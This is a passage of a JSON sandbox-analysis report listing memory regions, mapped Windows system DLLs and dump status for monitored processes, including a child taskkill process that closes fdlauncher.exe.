[ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2545", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:22.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_2546", "name": "pagefile_0x0000000000280000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2621440, "timestamp": "00:01:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1787953152, "type": "region", "version": 1 }, "end_va": 1788329983, "entry_point": 1788095304, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_2547", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1787953152, "timestamp": "00:01:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1788346368, "type": "region", "version": 1 }, "end_va": 1788387327, "entry_point": 1788351642, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_2548", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1788346368, "timestamp": "00:01:22.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 8716287, "entry_point": 0, "filename": null, "id": "region_2549", "name": "private_0x0000000000750000", "norm_filename": null, "region_type": "private_memory", "start_va": 7667712, "timestamp": "00:01:22.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33292288, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_2550", "name": "private_0x0000000001fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33292288, "timestamp": "00:01:22.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787924479, "entry_point": 1787783961, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_2551", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:22.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 32112639, "entry_point": 0, "filename": null, "id": "region_2552", "name": "private_0x0000000001e60000", "norm_filename": null, "region_type": "private_memory", "start_va": 31850496, "timestamp": "00:01:22.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32112640, "type": "region", "version": 1 }, "end_va": 32374783, "entry_point": 0, "filename": null, "id": "region_2553", "name": "private_0x0000000001ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32112640, "timestamp": "00:01:22.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 36499455, "entry_point": 33554432, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2554", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33554432, "timestamp": "00:01:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2555", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2556", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:22.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2557", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:22.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2558", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:22.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30539775, "entry_point": 0, "filename": null, "id": "region_2559", "name": "private_0x0000000001ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30277632, "timestamp": "00:01:22.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31326207, "entry_point": 0, "filename": null, "id": "region_2560", "name": "private_0x0000000001da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31064064, "timestamp": "00:01:22.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36765696, "type": "region", "version": 1 }, "end_va": 37027839, "entry_point": 0, "filename": null, "id": "region_2561", "name": "private_0x0000000002310000", "norm_filename": null, "region_type": "private_memory", "start_va": 36765696, "timestamp": "00:01:22.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 37748735, "entry_point": 0, "filename": null, "id": "region_2562", "name": "private_0x00000000023c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37486592, "timestamp": "00:01:22.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787699616, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_2563", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:22.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2564", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:22.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2565", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:22.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1785790464, "type": "region", "version": 1 }, "end_va": 1786404863, "entry_point": 1785919673, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_2566", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1785790464, "timestamp": "00:01:22.795", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1787559936, "type": "region", "version": 1 }, "end_va": 1787658239, "entry_point": 1787564853, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_2567", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1787559936, "timestamp": "00:01:22.796", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM fdlauncher.exe /IM fdlauncher.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_18", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 18, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2568", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:23.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2569", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:23.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2570", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:23.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2571", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:23.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2572", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:23.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_2573", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:23.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_2574", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:23.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 14745600, "type": "region", "version": 1 }, "end_va": 14835711, "entry_point": 14769289, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_2575", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 14745600, "timestamp": "00:01:23.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2576", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:23.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2577", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:23.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2578", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:23.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2579", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:23.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2580", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:23.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2581", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:23.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2582", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:23.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2583", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:23.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2584", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:23.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_2585", "name": "private_0x0000000000350000", "norm_filename": null, "region_type": "private_memory", "start_va": 3473408, "timestamp": "00:01:23.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2586", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:23.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2587", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:23.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2588", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:23.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_2589", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:23.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_2590", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:23.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2591", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:23.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2592", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:23.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 983040, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2593", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:23.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_2594", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:01:23.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 6619135, "entry_point": 0, "filename": null, "id": "region_2595", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:01:23.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1788391423, "entry_point": 1787433934, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_2596", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:23.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788473343, "entry_point": 1788416673, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_2597", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:23.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1788477440, "type": "region", "version": 1 }, "end_va": 1788514303, "entry_point": 1788482982, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_2598", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1788477440, "timestamp": "00:01:23.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788542976, "type": "region", "version": 1 }, "end_va": 1788612607, "entry_point": 1788547840, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_2599", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788542976, "timestamp": "00:01:23.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788891135, "entry_point": 1788679125, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_2600", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:23.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_2601", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:23.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2602", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:23.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2603", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:23.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_2604", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:23.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_2605", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", 